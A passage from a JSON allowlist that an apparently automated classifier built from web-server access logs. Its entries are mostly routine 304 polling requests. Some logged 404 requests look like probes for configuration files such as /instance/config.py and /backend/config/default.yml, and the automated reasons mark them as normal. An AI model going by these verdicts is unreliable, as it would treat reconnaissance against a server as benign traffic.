-\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:25.96414771Z" }, "da4bf72c296431e463bc5379dbd15f1bd199e5a4739e971b81f510bc4670b8b9": { "type": "hash", "value": "da4bf72c296431e463bc5379dbd15f1bd199e5a4739e971b81f510bc4670b8b9", "source": "auto", "reason": "Looks like a normal HTTP GET to an API endpoint returning 304 (not modified) with a typical latency and no error indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.479 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:25.808358157Z" }, "da62b75b1c178b2e45164179151e8441ec348dd67e0df4211d4c2cca606be4e1": { "type": "hash", "value": "da62b75b1c178b2e45164179151e8441ec348dd67e0df4211d4c2cca606be4e1", "source": "auto", "reason": "Normal HTTP GET request to root path with 200 response; typical access log entry.", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 0.751 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T06:25:06.603797687Z" }, "db999b8954db37820e77aa04e3277cfa3b10b7cafab8a889e6404af758404d49": { "type": "hash", "value": "db999b8954db37820e77aa04e3277cfa3b10b7cafab8a889e6404af758404d49", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.179 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:18.887698703Z" }, "dba297541174010119b567cbf2918dbd1244999aa0b3a10c2f73b78c9aa26efb": { "type": "hash", "value": "dba297541174010119b567cbf2918dbd1244999aa0b3a10c2f73b78c9aa26efb", "source": "auto", "reason": "Docker container access log shows a normal HTTP GET to an API endpoint returning 304 (not modified) with a typical response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.884 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:33.808552522Z" }, "dbb3a38ba60ee5800ecb247862893092f3a8b7deb2a06f95e21275d37b94193c": { "type": "hash", "value": "dbb3a38ba60ee5800ecb247862893092f3a8b7deb2a06f95e21275d37b94193c", "source": "auto", "reason": "Appears to be a routine HTTP GET request to an application logs endpoint with a 304 status and reasonable latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.581 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:33.896491409Z" }, "dcdf3290a84a571bfe87a4eb79fd69d464b3a0fcd7f62d67a00d80144f12c15c": { "type": "hash", "value": "dcdf3290a84a571bfe87a4eb79fd69d464b3a0fcd7f62d67a00d80144f12c15c", "source": "auto", "reason": "Routine HTTP GET request to a known API path with a 304 status and sub-second latency; appears to be normal application behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.760 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:16.211284891Z" }, "dcfa3b3e63242078be2bca795777f9c42563f507e7d9141e574e6a507af00f47": { "type": "hash", "value": "dcfa3b3e63242078be2bca795777f9c42563f507e7d9141e574e6a507af00f47", "source": "auto", "reason": "Routine HTTP GET to an API endpoint with a 304 (not modified) and a normal request duration; appears like normal application caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.686 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:15.711550758Z" }, "de36ef298748ddb0bd8a3908fa87beebda3bd8ba9b8c187cae2169d7b23bd4de": { "type": "hash", "value": "de36ef298748ddb0bd8a3908fa87beebda3bd8ba9b8c187cae2169d7b23bd4de", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a measured latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.669 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:15.58515684Z" }, "de465e59072688bb2ec32169250a1b5773de3c1333ca84fad49c948a58431e79": { "type": "hash", "value": "de465e59072688bb2ec32169250a1b5773de3c1333ca84fad49c948a58431e79", "source": "auto", "reason": "Routine HTTP GET to an app logs endpoint returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.052 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:12.710917357Z" }, "df0b82194a85db5b88e517cd1f23afeddbd49f08bb412a45b53e4aeb642ec430": { "type": "hash", "value": "df0b82194a85db5b88e517cd1f23afeddbd49f08bb412a45b53e4aeb642ec430", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint with a 304 (Not Modified), indicating normal client caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.420 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:57.704423934Z" }, "df6fc0c5a1799254af5dfb18c205d1956b8f606e2a369d2010b7b026ab2a5b6d": { "type": "hash", "value": "df6fc0c5a1799254af5dfb18c205d1956b8f606e2a369d2010b7b026ab2a5b6d", "source": "auto", "reason": "HTTP 404 on a normal GET request to /payment is a common client-side error and not inherently malicious.", "original_line": "\u001b[0mGET /payment \u001b[33m404\u001b[\u003cDUR\u003e 2.170 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:10:56.662636733Z" }, "e0041bdf4ca5024728367d22a434381ac708be68e1b3febcb7d7405d0f8b7661": { "type": "hash", "value": "e0041bdf4ca5024728367d22a434381ac708be68e1b3febcb7d7405d0f8b7661", "source": "auto", "reason": "Regular HTTP access log line with a successful response and a small duration. No anomalies detected.", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 0.736 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T16:07:41.17114863Z" }, "e0a753597c894c6c1d44eec11df7b5e381f265449bf9d74565552babe1050004": { "type": "hash", "value": "e0a753597c894c6c1d44eec11df7b5e381f265449bf9d74565552babe1050004", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application API endpoint with a 304 response (not modified).", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.022 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:40.059119863Z" }, "e0fff8da1e346faf3de8a75fa0403c21316ec15af1bbb6c091fe0c4915cbaa06": { "type": "hash", "value": "e0fff8da1e346faf3de8a75fa0403c21316ec15af1bbb6c091fe0c4915cbaa06", "source": "auto", "reason": "Routine HTTP GET request to an application API endpoint returning 304 (not modified) with a typical sub-second latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.704 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:21.570369392Z" }, "e279c5070acbf8bfbc050f4f63eab3d9eb32ffa6d679e2ea00806d7d219d5642": { "type": "hash", "value": "e279c5070acbf8bfbc050f4f63eab3d9eb32ffa6d679e2ea00806d7d219d5642", "source": "auto", "reason": "Looks like a routine HTTP GET to an app logs endpoint with a 304 (not modified) response and a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.168 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:00.633635338Z" }, "e2b1c2c38c0e2cf3f525ada640fd0694669cf848b86a387e1862e6ca24e420ef": { "type": "hash", "value": "e2b1c2c38c0e2cf3f525ada640fd0694669cf848b86a387e1862e6ca24e420ef", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning 304 (not modified), with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.300 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:48.590397237Z" }, "e2ec3d951df5c5b152661f6264df2620b1fcd8f6103a1cafb8e8eeaf4a44f7a6": { "type": "hash", "value": "e2ec3d951df5c5b152661f6264df2620b1fcd8f6103a1cafb8e8eeaf4a44f7a6", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning 304 (not modified) with a measured latency; looks like normal application traffic.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.833 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:57.593804126Z" }, "e3594342196bc32d5ad0f830440ab47894901254fd43ceff9d0655afc7a2777f": { "type": "hash", "value": "e3594342196bc32d5ad0f830440ab47894901254fd43ceff9d0655afc7a2777f", "source": "auto", "reason": "Routine HTTP GET request returning 304 (not modified) with reasonable latency, typical of client polling/cache validation.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.383 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:33.883493429Z" }, "e4a9c93e37259695b3e15af56f6f8e3696c632ae56fcf6607398a456e0ae6aa5": { "type": "hash", "value": "e4a9c93e37259695b3e15af56f6f8e3696c632ae56fcf6607398a456e0ae6aa5", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint with a successful 304 response and a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.717 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:42.735113898Z" }, "e5221761dbf6c200027e0c5c2d44ae716afd8f736f3359ed1c008e76828827a2": { "type": "hash", "value": "e5221761dbf6c200027e0c5c2d44ae716afd8f736f3359ed1c008e76828827a2", "source": "auto", "reason": "Routine access to robots.txt with 200 OK indicates normal web server behavior.", "original_line": "\u001b[0mGET /robots.txt \u001b[32m200\u001b[\u003cDUR\u003e 0.679 ms - 26\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T05:15:03.799196091Z" }, "e53b92e29a9d6bc7fd8b0532c190f84f67286df05040365f35e473b41a0b4ee3": { "type": "hash", "value": "e53b92e29a9d6bc7fd8b0532c190f84f67286df05040365f35e473b41a0b4ee3", "source": "auto", "reason": "Normal HTTP 404 response for a static path; typical web server behavior and not indicative of malicious activity", "original_line": "\u001b[0mGET /instance/config.py \u001b[33m404\u001b[\u003cDUR\u003e 0.675 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:32:20.529236334Z" }, "e64f470d7946a3c304838507ff6ce6cdcb4fe6e8816fe44b75c3bfb58c8ef583": { "type": "hash", "value": "e64f470d7946a3c304838507ff6ce6cdcb4fe6e8816fe44b75c3bfb58c8ef583", "source": "auto", "reason": "Looks like a routine HTTP GET returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.692 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:06.786120111Z" }, "e739cf04d4e096c2948f5b51d75f21ec62672daa9be967067d9ca0ce073be14f": { "type": "hash", "value": "e739cf04d4e096c2948f5b51d75f21ec62672daa9be967067d9ca0ce073be14f", "source": "auto", "reason": "Normal HTTP 404 response for a missing asset (GET /app.js) with a small duration; common in web apps during asset probing.", "original_line": "\u001b[0mGET /app.js \u001b[33m404\u001b[\u003cDUR\u003e 4.699 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:47.687564466Z" }, "e7505a837ba4be12ce8f2f7575e422f99f7498796b51225a2904a64d85dccc7a": { "type": "hash", "value": "e7505a837ba4be12ce8f2f7575e422f99f7498796b51225a2904a64d85dccc7a", "source": "auto", "reason": "Routine HTTP GET request to application logs endpoint returning 304 (Not Modified) with a reported response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.417 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:48.746798562Z" }, "e764f328cc1a201fb749faf3384b1ce3bd686105efef6c9b2256eb9ea2315082": { "type": "hash", "value": "e764f328cc1a201fb749faf3384b1ce3bd686105efef6c9b2256eb9ea2315082", "source": "auto", "reason": "Routine HTTP GET to an API endpoint with a 304 response; includes a request duration but no suspicious indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.317 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:24:57.965286411Z" }, "e767801b508936180d6eb47261fff2389f3c4dc49185474ccbaf0612e71b74b6": { "type": "hash", "value": "e767801b508936180d6eb47261fff2389f3c4dc49185474ccbaf0612e71b74b6", "source": "auto", "reason": "Docker container runtime sending SIGHUP (HUP) to a container is generally normal lifecycle/manager behavior.", "original_line": "\u001b[36mMarch 19th \u003cNUM\u003e, 10:31:35.538 pm \u001b[0mKill HUP Container: 9d722e5b66d09ad0e7c7bf353cdf4c48039ff5a0905fb7ddbbb99b6145b93677", "created_at": "2026-03-19T22:31:40.810541737Z" }, "e7f5e1e93eb09b271f9d51a03f1f602ae6bd3851e489db851f1f337ac797bd97": { "type": "hash", "value": "e7f5e1e93eb09b271f9d51a03f1f602ae6bd3851e489db851f1f337ac797bd97", "source": "auto", "reason": "Appears to be a normal HTTP GET request to an API endpoint returning 304 (not modified) with a typical latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.219 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:27.741262193Z" }, "e8d96354fdc633b8f03e8248468ccbbd62225f52c03b5ecda5ba06da5f86c25b": { "type": "hash", "value": "e8d96354fdc633b8f03e8248468ccbbd62225f52c03b5ecda5ba06da5f86c25b", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified); includes a typical response time and no error indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.042 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:39.711431088Z" }, "e8e1491d631e81a277525024f59efe9fc5b54f29bf71bd8e46780e244198bd9d": { "type": "hash", "value": "e8e1491d631e81a277525024f59efe9fc5b54f29bf71bd8e46780e244198bd9d", "source": "auto", "reason": "HTTP GET request to an internal API endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.315 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:30.741550228Z" }, "e99697bda3ab56bf52bb262a14dff5c6837cb0c599c81ff6ba6e105b3b8ab80d": { "type": "hash", "value": "e99697bda3ab56bf52bb262a14dff5c6837cb0c599c81ff6ba6e105b3b8ab80d", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.428 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:33.700573205Z" }, "e99cfc6f0f750e304e2d5889e1be5dddfd1c604455ce16b1d39f2d24e7ab1017": { "type": "hash", "value": "e99cfc6f0f750e304e2d5889e1be5dddfd1c604455ce16b1d39f2d24e7ab1017", "source": "auto", "reason": "Regular HTTP 404 response on a GET request to /plans; common in web services when a page/resource is missing. Not indicative of attack.", "original_line": "\u001b[0mGET /plans \u001b[33m404\u001b[\u003cDUR\u003e 0.653 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:40.054328871Z" }, "eb0ec2252b5fd332b9a1fb621ac8267fe8faaaff0ef874fd605bfd467b9006e9": { "type": "hash", "value": "eb0ec2252b5fd332b9a1fb621ac8267fe8faaaff0ef874fd605bfd467b9006e9", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint with a 304 status and normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 44.730 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:34.758780046Z" }, "ed589b2de880e179a2f0b532c55ca7457355d96b460e3a7f0aa4158b14ac0f6d": { "type": "hash", "value": "ed589b2de880e179a2f0b532c55ca7457355d96b460e3a7f0aa4158b14ac0f6d", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint with a 304 (not modified) response; includes typical timing field.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.503 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:57.761357267Z" }, "ed74f3e0116d9a5a7144f6f5e90cb61695f3df790249d816c6cc757487b5d1e0": { "type": "hash", "value": "ed74f3e0116d9a5a7144f6f5e90cb61695f3df790249d816c6cc757487b5d1e0", "source": "auto", "reason": "Routine HTTP GET request to an application API endpoint with a 304 response and low latency; no obvious attack indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.127 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:45.588647599Z" }, "ee7a4d508924f37e195b990d049ada719d5178ad923223f9d3c7aceb86782e57": { "type": "hash", "value": "ee7a4d508924f37e195b990d049ada719d5178ad923223f9d3c7aceb86782e57", "source": "auto", "reason": "Routine HTTP GET to an API endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.055 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:09.689300521Z" }, "ee7ddd199b85a8aa8ecbbf6b8145ebfbde9e12ba967995d1297ea4650495a25e": { "type": "hash", "value": "ee7ddd199b85a8aa8ecbbf6b8145ebfbde9e12ba967995d1297ea4650495a25e", "source": "auto", "reason": "An HTTP GET to an application API endpoint returning 304 (not modified) with a normal response time; appears to be routine client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 24.442 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:25.618561068Z" }, "eea7b319dcddb769b823bd7469137dbeebc04dbde3dfe910776cd3dd2ab69834": { "type": "hash", "value": "eea7b319dcddb769b823bd7469137dbeebc04dbde3dfe910776cd3dd2ab69834", "source": "auto", "reason": "Standard healthy HTTP GET request for a static asset returning 200; no anomalies observed.", "original_line": "\u001b[0mGET /static/js/main.ecef38b1.js \u001b[32m200\u001b[\u003cDUR\u003e 1.991 ms - \u003cNUM\u003e\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T10:32:50.125290715Z" }, "eeb14020609d51fe6b6fe5aaa0c251ce11ed808426168aabd816c25c2adc02f2": { "type": "hash", "value": "eeb14020609d51fe6b6fe5aaa0c251ce11ed808426168aabd816c25c2adc02f2", "source": "auto", "reason": "Routine HTTP GET to a logs endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.833 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:26.44394972Z" }, "eeed012d9bcfa409967168a12390744741285c4e59521cde299545fd63fea912": { "type": "hash", "value": "eeed012d9bcfa409967168a12390744741285c4e59521cde299545fd63fea912", "source": "auto", "reason": "Appears to be a routine HTTP GET to an internal API endpoint returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.818 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:39.886006485Z" }, "efd048cd026874c5e5eb08fa1b1077bb4530bf15a81eeb47bf053986fdddc43a": { "type": "hash", "value": "efd048cd026874c5e5eb08fa1b1077bb4530bf15a81eeb47bf053986fdddc43a", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 Not Modified with a normal low latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.020 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:51.726735129Z" }, "f04ca27bace64fda9820ea013d3f8167dd24dfc2220da60aa7ccfc97a7d81b68": { "type": "hash", "value": "f04ca27bace64fda9820ea013d3f8167dd24dfc2220da60aa7ccfc97a7d81b68", "source": "auto", "reason": "Looks like a routine HTTP GET request returning 304 (Not Modified) with a typical latency field.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.632 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:36.756098171Z" }, "f2edddb02b720d7509c0ed1b26a6d9ff5ee7d1f3470703e7a00e5926a15447e2": { "type": "hash", "value": "f2edddb02b720d7509c0ed1b26a6d9ff5ee7d1f3470703e7a00e5926a15447e2", "source": "auto", "reason": "Routine HTTP GET request to application logs endpoint returning 304 Not Modified; duration suggests normal caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.056 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:12.58953459Z" }, "f42713fcde18c4f676692077695ca6300d298bcc2a51ffd0288c1222d3383795": { "type": "hash", "value": "f42713fcde18c4f676692077695ca6300d298bcc2a51ffd0288c1222d3383795", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.415 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:12.763745548Z" }, "f479fcfd05c238abb6e7ba553870b0398fc77224e80079da3e3daadf99ec2351": { "type": "hash", "value": "f479fcfd05c238abb6e7ba553870b0398fc77224e80079da3e3daadf99ec2351", "source": "auto", "reason": "Appears to be a normal HTTP GET request to an application logs endpoint with a 304 status and request latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.023 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:12.897623117Z" }, "f48d3ca5cae76d6fff600fe7fe4175d9a9fdacb0b03551195394661f8a5ecf1b": { "type": "hash", "value": "f48d3ca5cae76d6fff600fe7fe4175d9a9fdacb0b03551195394661f8a5ecf1b", "source": "auto", "reason": "Regular HTTP access log line showing a successful request (GET /) and typical response code 200 with small duration and byte count.", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 0.704 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T02:06:51.130982645Z" }, "f4a1fbbacf9b5c5f5f69a7a20baaba1b0b131935df9b86bb9695545ec06c9310": { "type": "hash", "value": "f4a1fbbacf9b5c5f5f69a7a20baaba1b0b131935df9b86bb9695545ec06c9310", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning 304 (not modified) with a small duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.104 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:42.766751871Z" }, "f4ea9097614540bf8b0d7d9664978e686142e93a3c4a551da8060e96dd9eb3fc": { "type": "hash", "value": "f4ea9097614540bf8b0d7d9664978e686142e93a3c4a551da8060e96dd9eb3fc", "source": "auto", "reason": "Normal HTTP 404 response for a GET request to a manifest map; common during asset probing or missing assets, not inherently malicious.", "original_line": "\u001b[0mGET /manifest.json.map \u001b[33m404\u001b[\u003cDUR\u003e 0.631 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:23.20167801Z" }, "f5233d18d568ff85be0a5a9cd966aa9bb1555153dfc68e6262c2152eff65b48c": { "type": "hash", "value": "f5233d18d568ff85be0a5a9cd966aa9bb1555153dfc68e6262c2152eff65b48c", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning 304 (not modified) with a normal sub-30ms duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.749 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:21.813373773Z" }, "f54446aee11718e24f39e30dd2e290e53880a9756c14c0d5b5e8aec1127ac1d7": { "type": "hash", "value": "f54446aee11718e24f39e30dd2e290e53880a9756c14c0d5b5e8aec1127ac1d7", "source": "auto", "reason": "Looks like routine HTTP GET to an application logs endpoint returning 304 (not modified) with a short duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.103 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:09.539472807Z" }, "f64191aaf1169ad19d4255d9c15dac0d57a46cd6bcd4aac0e1e4c6a69a9165e1": { "type": "hash", "value": "f64191aaf1169ad19d4255d9c15dac0d57a46cd6bcd4aac0e1e4c6a69a9165e1", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application API returning 304 (not modified), with a measured response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.856 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:15.884637762Z" }, "f642cd4e0dd44fc330c08b301adaabc7d7e77d1491305298f54316fbd917a57f": { "type": "hash", "value": "f642cd4e0dd44fc330c08b301adaabc7d7e77d1491305298f54316fbd917a57f", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.536 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:09.818043207Z" }, "f6d6eac3f2de0587b23b406ff95b20867ba26d761e239fead482b1ba55be8157": { "type": "hash", "value": "f6d6eac3f2de0587b23b406ff95b20867ba26d761e239fead482b1ba55be8157", "source": "auto", "reason": "Routine API GET request returning HTTP 304 (not modified) with a short latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.258 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:33.962956039Z" }, "f6e2f1884335aaa0538821474b7be15b4e2d821ce7f8a43bd7c70b2237ff128e": { "type": "hash", "value": "f6e2f1884335aaa0538821474b7be15b4e2d821ce7f8a43bd7c70b2237ff128e", "source": "auto", "reason": "Standard 404 on a backend config file access; could be probing but within normal traffic for a web service", "original_line": "\u001b[0mGET /backend/config/default.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.582 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:33:32.832419568Z" }, "f788456cdb3a61b8b99ebd24deaf5ee4d2335801f81be623a2462286d3af408e": { "type": "hash", "value": "f788456cdb3a61b8b99ebd24deaf5ee4d2335801f81be623a2462286d3af408e", "source": "auto", "reason": "Docker container log shows a routine HTTP GET to an API endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.912 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:33.729670679Z" }, "f83a029082b89233c7c5cd0cf12d589156f87e8a1d409a072bfbee71a659f731": { "type": "hash", "value": "f83a029082b89233c7c5cd0cf12d589156f87e8a1d409a072bfbee71a659f731", "source": "auto", "reason": "Looks like a routine HTTP GET returning 304 (not modified) with a measured response time; no signs of exploitation or errors.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.268 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:54.862426077Z" }, "f9095baadc1af6c3e0705c30cdf59436fd3ab6d61a197533bd24eed674ca57c4": { "type": "hash", "value": "f9095baadc1af6c3e0705c30cdf59436fd3ab6d61a197533bd24eed674ca57c4", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint with a 304 response and short latency; no clear signs of exploitation.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.421 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:51.985477542Z" }, "f9dc96186fcea481d116c6361f8a7d859c81e91e8fc2183927fa2b4d45ee7c01": { "type": "hash", "value": "f9dc96186fcea481d116c6361f8a7d859c81e91e8fc2183927fa2b4d45ee7c01", "source": "auto", "reason": "Looks like a routine HTTP GET request with a 304 status and normal latency; no attack indicators.", "original_line": "\u001b[0mGET 